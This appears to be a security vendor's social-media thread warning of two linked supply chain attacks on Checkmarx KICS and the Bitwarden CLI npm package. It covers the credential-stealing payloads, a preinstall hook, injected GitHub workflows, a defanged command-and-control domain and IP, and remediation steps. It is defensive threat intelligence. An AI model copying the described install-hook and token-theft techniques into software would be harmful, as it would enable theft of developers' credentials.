🚨 Two supply chain attacks, same day, same C2. Sophos X-Ops is aware of reports of attackers hijacking Checkmarx KICS (Docker Hub, Open VSX, GitHub Actions) and the Bitwarden CLI (npm) to steal developer credentials on April 22. Evidence suggests one coordinated campaign. 🧵

Checkmarx KICS: tampered Docker images (5M+ pulls), backdoored VS Code extensions with a commit spoofed to look like it shipped in 2022, and a malicious GitHub Action release. Payload (mcpAddon.js) swept GitHub/npm tokens, cloud creds, SSH keys, Claude/MCP configs

Bitwarden CLI: @bitwarden/cli v2026.4.0 distributed for a 93-min window (17:57–19:30 ET). Preinstall hook pulled Bun + payload targeting developer creds, tokens, Cursor and Aider configs. 70K+ weekly downloads. Vault data reportedly not affected.

Novel twist on the Bitwarden side: stolen GitHub tokens were weaponized in-line to inject malicious workflows into victim repos, and the payload created public repos in victim accounts to store AES-encrypted data

Shared C2: both campaigns exfil to audit.checkmarx[.]cx (94.154.172[.]43).

This follows an incident last month where TeamPCP compromised Checkmarx GitHub Actions alongside Trivy, LiteLLM, and Telnyx in a broader supply chain attack campaign

If you pulled any affected versions: ▪️ Remove them now ▪️ Rotate GitHub/npm/cloud/SSH creds ▪️ Audit for injected workflows + new public repos in your org ▪️ Rotate secrets in any Claude/Cursor/Aider configs on affected hosts

Sophos coverage: ▪️ JS/Steal-EAP ▪️ Linux/Agnt-HZ▪️ 94.154.172[.]43 and checkmarx[.]cx blocked